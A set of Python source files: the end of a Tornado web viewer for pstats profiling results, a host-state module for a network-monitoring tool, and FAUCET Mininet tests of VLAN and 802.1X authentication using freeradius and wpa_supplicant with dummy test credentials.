self.width, self.print_list = width, self._full_print_list
else:
self.width, self.print_list = self.stats.get_print_list((selector,))
self.func_to_id = {}
self.id_to_func = {}
for i, func in enumerate(self.print_list):
self.id_to_func[i] = func
self.func_to_id[func] = i
if selector is not None:
for i, func in enumerate(self._full_print_list):
if func not in self.func_to_id:
self.func_to_id[func] = -(i+1)
self.id_to_func[-(i+1)] = func
self.tabstyle = """
table {
font-family:Arial, Helvetica, sans-serif;
color: black;
font-size:14px;
text-shadow: 1px 1px 0px #fff;
background:#eaebec;
margin:10px;
border: black 1px solid;
-moz-border-radius:3px;
-webkit-border-radius:3px;
border-radius:3px;
}
table th {
padding-right: 5px;
padding-left: 5px;
background: #ededed;
}
table td {
border-top: 1px solid #ffffff;
border-bottom:1px solid #e0e0e0;
border-left: 1px solid #e0e0e0;
background: #e6e6e6;
text-align: center;
}
table td:first-child {
text-align: left;
padding-right: 10px;
}
table tr.even td {
background: #f2f2f2;
}
table tr:hover td {
background: #ccffff;
}
"""
handlers = [
(r"/", Index),
(r"/func/([0-9]+)", Function),
]
settings = dict(
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
)
super(Application, self).__init__(handlers, **settings)
def getFunctionLink(self, func):
_, _, func_name = func
title = func_name
fid = self.func_to_id[func]
if fid < 0:
return '<label>%s</label>' % formatfunc(func)
else:
return '<a title="%s" href="/func/%s">%s</a>' % (title, fid, formatfunc(func))
class Index(tornado.web.RequestHandler):
def get(self):
app = self.application
table = []
sort_index = ['cc', 'nc', 'tt', 'ct'].index(self.get_argument('sort', 'ct'))
app.print_list.sort(
key=lambda func: app.stats.stats[func][sort_index],
reverse=True)
for i, func in enumerate(app.print_list):
file, line, func_name = func
primitive_calls, total_calls, exclusive_time, inclusive_time, callers = app.stats.stats[func]
if primitive_calls == 0:
extime = exclusive_time
inctime = inclusive_time
else:
extime = exclusive_time / primitive_calls
inctime = inclusive_time / primitive_calls
if i % 2 == 0:
klass = 'even'
else:
klass = None
row = wrapTag('tr', ''.join(wrapTag('td', cell) for cell in (
app.getFunctionLink(func),
formatTimeAndPercent(exclusive_time, app.total_time),
formatTimeAndPercent(inclusive_time, app.total_time),
primitive_calls,
total_calls,
formatTime(extime),
formatTime(inctime))), klass=klass)
table.append(row)
self.write('''\
<html>
<head>
<style>%s</style>
</head>
<body>
<h1>%s</h1>
<h2>Total time: %s</h2>
<table>
<tr>
<th>file:line:function</th>
<th><a href="?sort=tt">Exclusive time</a></th>
<th><a href="?sort=ct">Inclusive time</a></th>
<th><a href="?sort=cc">Primitive calls</a></th>
<th><a href="?sort=nc">Total calls</a></th>
<th>Exclusive per call</th>
<th>Inclusive per call</th>
</tr>
%s
</table>
</body>
</html>
''' % (app.tabstyle, app.filename, formatTime(app.total_time), '\n'.join(table)))
class Function(tornado.web.RequestHandler):
def get(self, func_id):
app = self.application
func_id = int(func_id)
if func_id < 0:
func = app.id_to_unslected_func[-func_id]
else:
func = app.id_to_func[func_id]
f_cc, f_nc, f_tt, f_ct, callers = app.stats.stats[func]
callees = app.stats.all_callees[func]
def sortedByInclusive(items):
sortable = [(ct, (f, (cc, nc, tt, ct))) for f, (cc, nc, tt, ct) in items]
return [y for x, y in reversed(sorted(sortable))]
def buildFunctionTable(items):
callersTable = []
for i, (caller, (cc, nc, tt, ct)) in enumerate(sortedByInclusive(items)):
if i % 2 == 0:
klass = 'even'
else:
klass = None
callersTable.append(wrapTag('tr', ''.join(wrapTag('td', cell)
for cell in (
app.getFunctionLink(caller),
formatTimeAndPercent(tt, app.total_time),
formatTimeAndPercent(ct, app.total_time),
cc,
nc,
formatTime(tt / cc),
formatTime(ct / cc))), klass=klass))
return '\n'.join(callersTable)
caller_stats = [(c, app.stats.stats[c][:4]) for c in callers]
callersTable = buildFunctionTable(caller_stats)
calleesTable = buildFunctionTable(callees.items())
self.write('''\
<html>
<head>
<style>%s</style>
</head>
<body>
<a href="/">Home</a>
<h1>%s</h1>
<table>
<tr><th align="left">Primitive Calls</th><td>%s</td></tr>
<tr><th align="left">Total calls</th><td>%s</td></tr>
<tr><th align="left">Exclusive time</th><td>%s</td></tr>
<tr><th align="left">Inclusive time</th><td>%s</td></tr>
</table>
<h2>Callers</h2>
<table>
<tr>
<th>Function</th>
<th>Exclusive time</th>
<th>Inclusive time</th>
<th>Primitive calls</th>
<th>Total calls</th>
<th>Exclusive per call</th>
<th>Inclusive per call</th>
</tr>
%s
</table>
<h2>Callees</h2>
<table>
<tr>
<th>Function</th>
<th>Exclusive time</th>
<th>Inclusive time</th>
<th>Primitive calls</th>
<th>Total calls</th>
<th>Exclusive per call</th>
<th>Inclusive per call</th>
</tr>
%s
</table>
</body>
</html>
''' % (app.tabstyle, formatfunc(func), f_cc, f_nc, f_tt, f_ct,
callersTable, calleesTable))
def view_pstats(prof_pattern, selector=None, port=8009):
"""
Start an interactive web viewer for profiling data.
Parameters
----------
prof_pattern: str
Name of profile data file or glob pattern.
selector : str, optional
Portion of filename used to select funtions.
port: int
Port number used by web server.
"""
prof_files = sorted(fnmatch.filter(os.listdir('.'), prof_pattern))
if prof_files:
stats = pstats.Stats(prof_files[0])
for pfile in prof_files[1:]:
stats.add(pfile)
app = Application(stats, selector)
app.listen(port)
print("starting server on port %d" % port)
serve_thread = startThread(tornado.ioloop.IOLoop.current().start)
launch_thread = startThread(lambda: launch_browser(port))
while serve_thread.isAlive():
serve_thread.join(timeout=1)
def cmd_view_pstats(args=None):
"""
Allows calling of view_pstats from a console script.
"""
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--port', action='store', dest='port',
default=8009, type=int,
help='port used for web server')
parser.add_argument('--filter', action='store', dest='filter',
default=None,
help='portion of filename used to filter displayed functions.')
parser.add_argument('file', metavar='file', nargs=1,
help='profile file to view.')
options = parser.parse_args(args)
view_pstats(options.file[0], port=options.port, selector=options.filter)
if __name__ == '__main__':
cmd_view_pstats()
|
host_state.py
|
"""
Global shared state about the host.
"""
import threading
import utils
import time
import sys
CLIENT_VERSION = '1.0.3-L'
class HostState(object):
def __init__(self):
self.host_ip = None
self.host_mac = None
self.gateway_ip = None
self.packet_processor = None
self.user_key = None
self.secret_salt = None
self.client_version = CLIENT_VERSION
self.persistent_mode = True # Always persistent to remove local Flask
# The following objects might be modified concurrently.
self.lock = threading.Lock()
self.ip_mac_dict = {} # IP -> MAC
self.pending_dhcp_dict = {} # device_id -> hostname
self.dhcp_dict = {}
self.pending_resolver_dict = {} # device_id -> resolver_ip
self.pending_dns_dict = {} # (device_id, domain) -> ip_set
self.pending_flow_dict = {} # flow_key -> flow_stats
self.pending_ua_dict = {} # device_id -> ua_set
self.pending_tls_dict_list = [] # List of tls_dict
self.pending_netdisco_dict = {} # device_id -> device_info_list
self.pending_syn_scan_dict = {} # device_id -> port_list
self.status_text = None
self.device_whitelist = []
self.has_consent = True
self.byte_count = 0
self.is_inspecting_traffic = True
self.fast_arp_scan = True # Persists for first 5 mins
self.last_ui_contact_ts = time.time() # ts of /is_inspecting_traffic
self.quit = False
self.spoof_arp = True
self.block_device_dict = {} # device_id -> (start_unix_ts, stop_unix_ts)
self.last_get_traffic_ts = time.time() # Timestamp when /get_traffic was called
# Constantly checks for IP changes on this host
thread = threading.Thread(target=self.update_ip_thread)
thread.daemon = True
thread.start()
def set_ip_mac_mapping(self, ip, mac):
with self.lock:
self.ip_mac_dict[ip] = mac
def get_ip_mac_dict_copy(self):
with self.lock:
return dict(self.ip_mac_dict)
def is_inspecting(self):
with self.lock:
return self.is_inspecting_traffic
def update_ip_thread(self):
prev_gateway_ip = None
prev_host_ip = None
while True:
try:
self.gateway_ip, _, self.host_ip = utils.get_default_route()
except Exception:
pass
# Upon network changes, clear ARP cache.
if self.gateway_ip != prev_gateway_ip or \
self.host_ip != prev_host_ip:
with self.lock:
self.ip_mac_dict = {}
prev_gateway_ip = self.gateway_ip
prev_host_ip = self.host_ip
time.sleep(15)
|
mininet_tests.py
|
#!/usr/bin/env python3
"""Mininet tests for FAUCET."""
# pylint: disable=too-many-lines
# pylint: disable=missing-class-docstring,missing-function-docstring
# pylint: disable=too-many-arguments
import binascii
import collections
import copy
import itertools
import ipaddress
import json
import os
import random
import re
import shutil
import socket
import threading
import time
import unittest
from http.server import SimpleHTTPRequestHandler
from http.server import HTTPServer
import scapy.all
import yaml # pytype: disable=pyi-error
from mininet.log import error
from mininet.util import pmonitor
from clib import mininet_test_base
from clib import mininet_test_util
from clib.mininet_test_base import PEER_BGP_AS, IPV4_ETH, IPV6_ETH
MIN_MBPS = 100
CONFIG_BOILER_UNTAGGED = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
CONFIG_TAGGED_BOILER = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
%(port_2)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
%(port_3)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
%(port_4)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
"""
class QuietHTTPServer(HTTPServer):
allow_reuse_address = True
timeout = None
@staticmethod
def handle_error(_request, _client_address):
return
class PostHandler(SimpleHTTPRequestHandler):
def log_message(self, format, *args): # pylint: disable=redefined-builtin
return
def _log_post(self):
content_len = int(self.headers.get('content-length', 0))
content = self.rfile.read(content_len).decode().strip()
if content and hasattr(self.server, 'influx_log'):
with open(self.server.influx_log, 'a') as influx_log:
influx_log.write(content + '\n')
class InfluxPostHandler(PostHandler):
def do_POST(self): # pylint: disable=invalid-name
self._log_post()
return self.send_response(204)
class SlowInfluxPostHandler(PostHandler):
def do_POST(self): # pylint: disable=invalid-name
self._log_post()
time.sleep(self.server.timeout * 3)
return self.send_response(500)
class FaucetTest(mininet_test_base.FaucetTestBase):
pass
class FaucetUntaggedTest(FaucetTest):
"""Basic untagged VLAN test."""
HOST_NAMESPACE = {}
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
EVENT_SOCK_HEARTBEAT = '5'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
# pylint: disable=invalid-name
CONFIG = CONFIG_BOILER_UNTAGGED
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid,
host_namespace=self.HOST_NAMESPACE)
self.start_net()
def verify_events_log(self, event_log, timeout=10):
required_events = {'CONFIG_CHANGE', 'PORT_CHANGE', 'L2_LEARN', 'PORTS_STATUS', 'EVENT_SOCK_HEARTBEAT'}
for _ in range(timeout):
prom_event_id = self.scrape_prometheus_var('faucet_event_id', dpid=False)
event_id = None
with open(event_log, 'r') as event_log_file:
for event_log_line in event_log_file.readlines():
event = json.loads(event_log_line.strip())
event_id = event['event_id']
required_events -= set(event.keys())
if prom_event_id == event_id:
return
time.sleep(1)
self.assertEqual(prom_event_id, event_id)
self.assertFalse(required_events)
def test_untagged(self):
"""All hosts on the same untagged VLAN should have connectivity."""
self._enable_event_log()
self.ping_all_when_learned()
self.flap_all_switch_ports()
self.verify_traveling_dhcp_mac()
self.gauge_smoke_test()
self.prometheus_smoke_test()
self.assertGreater(os.path.getsize(self.event_log), 0)
self.verify_events_log(self.event_log)
class Faucet8021XBase(FaucetTest):
NUM_FAUCET_CONTROLLERS = 1
NUM_GAUGE_CONTROLLERS = 1
HOST_NAMESPACE = {3: False}
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
RADIUS_PORT = None
DOT1X_EXPECTED_EVENTS = []
SESSION_TIMEOUT = 3600
LOG_LEVEL = 'DEBUG'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
native_vlan: 100
# 802.1x client.
dot1x: True
%(port_2)d:
native_vlan: 100
# 802.1X client.
dot1x: True
%(port_3)d:
native_vlan: 100
# ping host.
%(port_4)d:
output_only: True
# "NFV host - interface used by controller."
"""
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="user"
password="microphone"
}
"""
wpasupplicant_conf_2 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="admin"
password="megaphone"
}
"""
freeradius_user_conf = """user Cleartext-Password := "microphone"
Session-timeout = {0}
admin Cleartext-Password := "megaphone"
Session-timeout = {0}
vlanuser1001 Cleartext-Password := "password"
Tunnel-Type = "VLAN",
Tunnel-Medium-Type = "IEEE-802",
Tunnel-Private-Group-id = "radiusassignedvlan1"
vlanuser2222 Cleartext-Password := "milliphone"
Tunnel-Type = "VLAN",
Tunnel-Medium-Type = "IEEE-802",
Tunnel-Private-Group-id = "radiusassignedvlan2"
filter_id_user_accept Cleartext-Password := "accept_pass"
Filter-Id = "accept_acl"
filter_id_user_deny Cleartext-Password := "deny_pass"
Filter-Id = "deny_acl"
"""
eapol1_host = None
eapol2_host = None
ping_host = None
nfv_host = None
nfv_intf = None
nfv_portno = None
@staticmethod
def _priv_mac(host_id):
two_byte_port_num = '%04x' % host_id
two_byte_port_num_formatted = ':'.join((two_byte_port_num[:2], two_byte_port_num[2:]))
return '00:00:00:00:%s' % two_byte_port_num_formatted
def pre_start_net(self):
self.eapol1_host, self.eapol2_host, self.ping_host, self.nfv_host = self.hosts_name_ordered()
switch = self.first_switch()
last_host_switch_link = switch.connectionsTo(self.nfv_host)[0]
nfv_intf = [
intf for intf in last_host_switch_link if intf in switch.intfList()][0]
self.nfv_intf = str(nfv_intf)
nfv_intf = self.nfv_host.intf()
self.RADIUS_PORT = mininet_test_util.find_free_udp_port(self.ports_sock, self._test_name())
self.CONFIG = self.CONFIG.replace('NFV_INTF', str(nfv_intf))
self.CONFIG = self.CONFIG.replace('RADIUS_PORT', str(self.RADIUS_PORT))
super()._init_faucet_config()
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid,
host_namespace=self.HOST_NAMESPACE)
self.start_net()
self.nfv_portno = self.port_map['port_4']
self.host_drop_all_ips(self.nfv_host)
self.nfv_pids = []
tcpdump_args = '-e -n -U'
self.eapol1_host.cmd(
mininet_test_util.timeout_cmd(
'tcpdump -w %s/%s-start.pcap %s ether proto 0x888e &' % (
self.tmpdir, self.eapol1_host.name, tcpdump_args), 300))
self.nfv_host.cmd(
mininet_test_util.timeout_cmd(
'tcpdump -i %s-eth0 -w %s/eap-lo.pcap %s ether proto 0x888e &' % (
self.nfv_host.name, self.tmpdir, tcpdump_args), 300))
self.nfv_pids.append(int(self.nfv_host.lastPid))
self.nfv_host.cmd(
mininet_test_util.timeout_cmd(
'tcpdump -i lo -w %s/radius.pcap %s udp port %d &' % (
self.tmpdir, tcpdump_args, self.RADIUS_PORT), 300))
self.nfv_pids.append(int(self.nfv_host.lastPid))
self.radius_log_path = self.start_freeradius()
self.nfv_pids.append(int(self.nfv_host.lastPid))
self._enable_event_log(300)
def tearDown(self, ignore_oferrors=False):
for pid in self.nfv_pids:
self.nfv_host.cmd('kill %u' % pid)
super().tearDown(ignore_oferrors=ignore_oferrors)
def post_test_checks(self):
self.assertGreater(os.path.getsize(self.event_log), 0)
self.verify_dot1x_events_log()
def verify_dot1x_events_log(self):
def replace_mac(host_no):
replacement_macs = {
'HOST1_MAC': self.eapol1_host.MAC(),
'HOST2_MAC': self.eapol2_host.MAC(),
'HOST3_MAC': self.ping_host.MAC(),
'HOST4_MAC': self.nfv_host.MAC(),
}
return replacement_macs.get(host_no, None)
def insert_dynamic_values(dot1x_expected_events):
for dot1x_event in dot1x_expected_events:
top_level_key = list(dot1x_event.keys())[0]
dot1x_params = {'dp_id': int(self.dpid)}
for key, val in dot1x_event[top_level_key].items():
if key == 'port':
dot1x_params[key] = self.port_map[val]
elif key == 'eth_src':
dot1x_params[key] = replace_mac(val)
dot1x_event[top_level_key].update(dot1x_params)
if not self.DOT1X_EXPECTED_EVENTS:
return
dot1x_expected_events = copy.deepcopy(self.DOT1X_EXPECTED_EVENTS)
insert_dynamic_values(dot1x_expected_events)
with open(self.event_log, 'r') as event_file:
events_that_happened = []
for event_log_line in event_file.readlines():
if 'DOT1X' not in event_log_line:
continue
event = json.loads(event_log_line.strip())
events_that_happened.append(event['DOT1X'])
for expected_event in dot1x_expected_events:
self.assertTrue(expected_event in events_that_happened,
msg='expected event: {} not in events_that_happened {}'.format(
expected_event, events_that_happened))
@staticmethod
def _eapol_filter(fields):
return '(' + ' and '.join(('ether proto 0x888e',) + fields) + ')'
def _success_eapol_filter(self, expect_success):
eap_code = '0x04'
if expect_success:
eap_code = '0x03'
return self._eapol_filter(('ether[14:4] == 0x01000004', 'ether[18] == %s' % eap_code))
def _logoff_eapol_filter(self):
return self._eapol_filter(('ether[14:4] == 0x01020000',))
def try_8021x(self, host, port_num, conf, and_logoff=False, terminate_wpasupplicant=False,
wpasup_timeout=180, tcpdump_timeout=30, expect_success=True):
if expect_success:
self.wait_8021x_flows(port_num)
port_labels = self.port_labels(port_num)
success_total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels, default=0)
failure_total = self.scrape_prometheus_var(
'port_dot1x_failure_total', labels=port_labels, default=0)
logoff_total = self.scrape_prometheus_var(
'port_dot1x_logoff_total', labels=port_labels, default=0)
dp_success_total = self.scrape_prometheus_var(
'dp_dot1x_success_total', default=0)
dp_failure_total = self.scrape_prometheus_var(
'dp_dot1x_failure_total', default=0)
dp_logoff_total = self.scrape_prometheus_var(
'dp_dot1x_logoff_total', default=0)
tcpdump_filters = [self._success_eapol_filter(expect_success)]
if and_logoff:
tcpdump_filters.append(self._logoff_eapol_filter())
tcpdump_packets = len(tcpdump_filters)
tcpdump_filter = ' or '.join(tcpdump_filters)
tcpdump_txt = self.tcpdump_helper(
host, tcpdump_filter, [
lambda: self.wpa_supplicant_callback(
host, port_num, conf, and_logoff,
timeout=wpasup_timeout,
terminate_wpasupplicant=terminate_wpasupplicant)],
timeout=tcpdump_timeout, vflags='-vvv', packets=tcpdump_packets)
if expect_success:
self.wait_for_eap_success(host, self.get_wpa_ctrl_path(host))
if not and_logoff:
self.wait_8021x_success_flows(host, port_num)
success = 'Success' in tcpdump_txt
if expect_success != success:
return False
new_success_total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels, default=0)
new_failure_total = self.scrape_prometheus_var(
'port_dot1x_failure_total', labels=port_labels, default=0)
new_logoff_total = self.scrape_prometheus_var(
'port_dot1x_logoff_total', labels=port_labels, default=0)
new_dp_success_total = self.scrape_prometheus_var(
'dp_dot1x_success_total', default=0)
new_dp_failure_total = self.scrape_prometheus_var(
'dp_dot1x_failure_total', default=0)
new_dp_logoff_total = self.scrape_prometheus_var(
'dp_dot1x_logoff_total', default=0)
if expect_success and success:
self.assertGreater(new_success_total, success_total)
self.assertGreater(new_dp_success_total, dp_success_total)
self.assertEqual(failure_total, new_failure_total)
self.assertEqual(dp_failure_total, new_dp_failure_total)
logoff = 'logoff' in tcpdump_txt
if logoff != and_logoff:
return False
if and_logoff:
self.assertGreater(new_logoff_total, logoff_total)
return True
self.assertEqual(logoff_total, new_logoff_total)
self.assertEqual(dp_logoff_total, new_dp_logoff_total)
self.assertEqual(dp_success_total, new_dp_success_total)
self.assertGreaterEqual(new_failure_total, failure_total)
self.assertGreaterEqual(new_dp_failure_total, dp_failure_total)
return False
def retry_8021x(self, host, port_num, conf, and_logoff=False, retries=2, expect_success=True):
for _ in range(retries):
if self.try_8021x(host, port_num, conf, and_logoff, expect_success=expect_success):
return True
time.sleep(1)
return False
def wait_8021x_flows(self, port_no):
port_actions = [
'SET_FIELD: {eth_dst:%s}' % self._priv_mac(port_no), 'OUTPUT:%u' % self.nfv_portno]
from_nfv_actions = [
'SET_FIELD: {eth_src:01:80:c2:00:00:03}', 'OUTPUT:%d' % port_no]
from_nfv_match = {
'in_port': self.nfv_portno, 'dl_src': self._priv_mac(port_no), 'dl_type': 0x888e}
self.wait_until_matching_flow(None, table_id=0, actions=port_actions)
self.wait_until_matching_flow(from_nfv_match, table_id=0, actions=from_nfv_actions)
def wait_8021x_success_flows(self, host, port_no):
from_host_actions = [
'GOTO_TABLE:1']
from_host_match = {
'in_port': port_no, 'dl_src': host.MAC()}
self.wait_until_matching_flow(from_host_match, table_id=0, actions=from_host_actions)
def verify_host_success(self, eapol_host, port_no, wpasupplicant_conf, and_logoff):
self.one_ipv4_ping(
eapol_host, self.ping_host.IP(), require_host_learned=False, expected_result=False)
self.assertTrue(
self.try_8021x(
eapol_host, port_no, wpasupplicant_conf, and_logoff=and_logoff))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(), require_host_learned=False, expected_result=True)
def wpa_supplicant_callback(self, host, port_num, conf, and_logoff, timeout=10, terminate_wpasupplicant=False):
wpa_ctrl_path = self.get_wpa_ctrl_path(host)
if os.path.exists(wpa_ctrl_path):
self.terminate_wpasupplicant(host)
for pid in host.cmd('lsof -t %s' % wpa_ctrl_path).splitlines():
try:
os.kill(int(pid), 15)
except (ValueError, ProcessLookupError):
pass
try:
shutil.rmtree(wpa_ctrl_path)
except FileNotFoundError:
pass
log_prefix = host.name + '_'
self.start_wpasupplicant(
host, conf, timeout=timeout,
wpa_ctrl_socket_path=wpa_ctrl_path, log_prefix=log_prefix)
if and_logoff:
self.wait_for_eap_success(host, wpa_ctrl_path)
self.wait_until_matching_flow(
{'eth_src': host.MAC(), 'in_port': port_num}, table_id=0)
self.one_ipv4_ping(
host, self.ping_host.IP(), require_host_learned=False)
host.cmd('wpa_cli -p %s logoff' % wpa_ctrl_path)
self.wait_until_no_matching_flow(
{'eth_src': host.MAC(), 'in_port': port_num}, table_id=0)
self.one_ipv4_ping(
host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
if terminate_wpasupplicant:
self.terminate_wpasupplicant(host)
def terminate_wpasupplicant(self, host):
wpa_ctrl_path = self.get_wpa_ctrl_path(host)
host.cmd('wpa_cli -p %s terminate' % wpa_ctrl_path)
def get_wpa_ctrl_path(self, host):
wpa_ctrl_path = os.path.join(
self.tmpdir, '%s/%s-wpasupplicant' % (self.tmpdir, host.name))
return wpa_ctrl_path
@staticmethod
def get_wpa_status(host, wpa_ctrl_path):
status = host.cmdPrint('wpa_cli -p %s status' % wpa_ctrl_path)
for line in status.splitlines():
if line.startswith('EAP state'):
return line.split('=')[1].strip()
return None
def wait_for_eap_success(self, host, wpa_ctrl_path, timeout=5):
for _ in range(timeout):
eap_state = self.get_wpa_status(host, wpa_ctrl_path)
if eap_state == 'SUCCESS':
return
time.sleep(1)
self.fail('did not get EAP success: %s' % eap_state)
def wait_for_radius(self, radius_log_path):
self.wait_until_matching_lines_from_file(
r'.*Ready to process requests', radius_log_path)
def start_freeradius(self):
radius_log_path = '%s/radius.log' % self.tmpdir
listen_match = r'(listen {[^}]*(limit {[^}]*})[^}]*})|(listen {[^}]*})'
listen_config = """listen {
type = auth
ipaddr = *
port = %s
}
listen {
type = acct
ipaddr = *
port = %d
}""" % (self.RADIUS_PORT, self.RADIUS_PORT + 1)
if os.path.isfile('/etc/freeradius/users'):
# Assume we are dealing with freeradius 2 configuration
shutil.copytree('/etc/freeradius/', '%s/freeradius' % self.tmpdir)
users_path = '%s/freeradius/users' % self.tmpdir
with open('%s/freeradius/radiusd.conf' % self.tmpdir, 'r+') as default_site:
default_config = default_site.read()
default_config = re.sub(listen_match, '', default_config)
default_site.seek(0)
default_site.write(default_config)
default_site.write(listen_config)
default_site.truncate()
else:
# Assume we are dealing with freeradius >=3 configuration
freerad_version = os.popen(
r'freeradius -v | egrep -o -m 1 "Version ([0-9]\.[0.9])"').read().rstrip()
freerad_major_version = freerad_version.split(' ')[1]
shutil.copytree('/etc/freeradius/%s/' % freerad_major_version,
'%s/freeradius' % self.tmpdir)
users_path = '%s/freeradius/mods-config/files/authorize' % self.tmpdir
with open('%s/freeradius/sites-enabled/default' % self.tmpdir, 'r+') as default_site:
default_config = default_site.read()
default_config = re.sub(
listen_match, '', default_config)
default_config = re.sub(
r'server default {', 'server default {\n' + listen_config, default_config)
default_site.seek(0)
default_site.write(default_config)
default_site.truncate()
with open(users_path, 'w') as users_file:
users_file.write(self.freeradius_user_conf.format(self.SESSION_TIMEOUT))
with open('%s/freeradius/clients.conf' % self.tmpdir, 'w') as clients:
clients.write("""client localhost {
ipaddr = 127.0.0.1
secret = SECRET
}""")
with open('%s/freeradius/sites-enabled/inner-tunnel' % self.tmpdir, 'r+') as innertunnel_site:
tunnel_config = innertunnel_site.read()
listen_config = """listen {
ipaddr = 127.0.0.1
port = %d
type = auth
}""" % (self.RADIUS_PORT + 2)
tunnel_config = re.sub(listen_match, listen_config, tunnel_config)
innertunnel_site.seek(0)
innertunnel_site.write(tunnel_config)
innertunnel_site.truncate()
os.system('chmod o+rx %s' % self.root_tmpdir)
os.system('chown -R root:freerad %s/freeradius/' % self.tmpdir)
self.nfv_host.cmd(
mininet_test_util.timeout_cmd(
'freeradius -X -l %s -d %s/freeradius &' % (radius_log_path, self.tmpdir),
300))
self.wait_for_radius(radius_log_path)
return radius_log_path
class Faucet8021XSuccessTest(Faucet8021XBase):
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
{'AUTHENTICATION': {'port': 'port_2', 'eth_src': 'HOST2_MAC', 'status': 'success'}},
{'AUTHENTICATION': {'port': 'port_2', 'eth_src': 'HOST2_MAC', 'status': 'logoff'}}]
SESSION_TIMEOUT = 3600
def test_untagged(self):
self.verify_host_success(
self.eapol1_host, self.port_map['port_1'], self.wpasupplicant_conf_1, False)
self.verify_host_success(
self.eapol2_host, self.port_map['port_2'], self.wpasupplicant_conf_1, True)
self.post_test_checks()
class Faucet8021XFailureTest(Faucet8021XBase):
"""Failure due to incorrect identity/password"""
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="user"
password="wrongpassword"
}
"""
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'failure'}}]
def test_untagged(self):
self.assertFalse(
self.try_8021x(
self.eapol1_host, self.port_map['port_1'],
self.wpasupplicant_conf_1, and_logoff=False,
expect_success=False))
self.post_test_checks()
class Faucet8021XPortStatusTest(Faucet8021XBase):
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'PORT_DOWN': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'PORT_DOWN': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
{'PORT_DOWN': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}}]
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
port_no4 = self.port_map['port_4']
self.wait_8021x_flows(port_no1)
self.set_port_down(port_no1)
# self.wait_until_no_matching_flow(None, table_id=0, actions=actions)
self.set_port_up(port_no1)
self.wait_8021x_flows(port_no1)
self.set_port_down(port_no4)
# self.wait_until_no_matching_flow(match, table_id=0, actions=actions)
self.set_port_up(port_no4)
self.wait_8021x_flows(port_no1)
# check only have rules for port 2 installed, after the NFV port comes up
self.set_port_down(port_no1)
self.flap_port(port_no4)
self.wait_8021x_flows(port_no2)
# no portno1
self.set_port_up(port_no1)
self.wait_8021x_flows(port_no1)
# When the port goes down, and up the host should not be authenticated anymore.
self.assertTrue(self.retry_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(), require_host_learned=False)
# terminate so don't automatically reauthenticate when port goes back up.
self.terminate_wpasupplicant(self.eapol1_host)
self.flap_port(port_no1)
self.wait_8021x_flows(port_no1)
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XPortFlapTest(Faucet8021XBase):
def test_untagged(self):
port_no1 = self.port_map['port_1']
for _ in range(2):
self.set_port_up(port_no1)
self.assertTrue(self.retry_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=True))
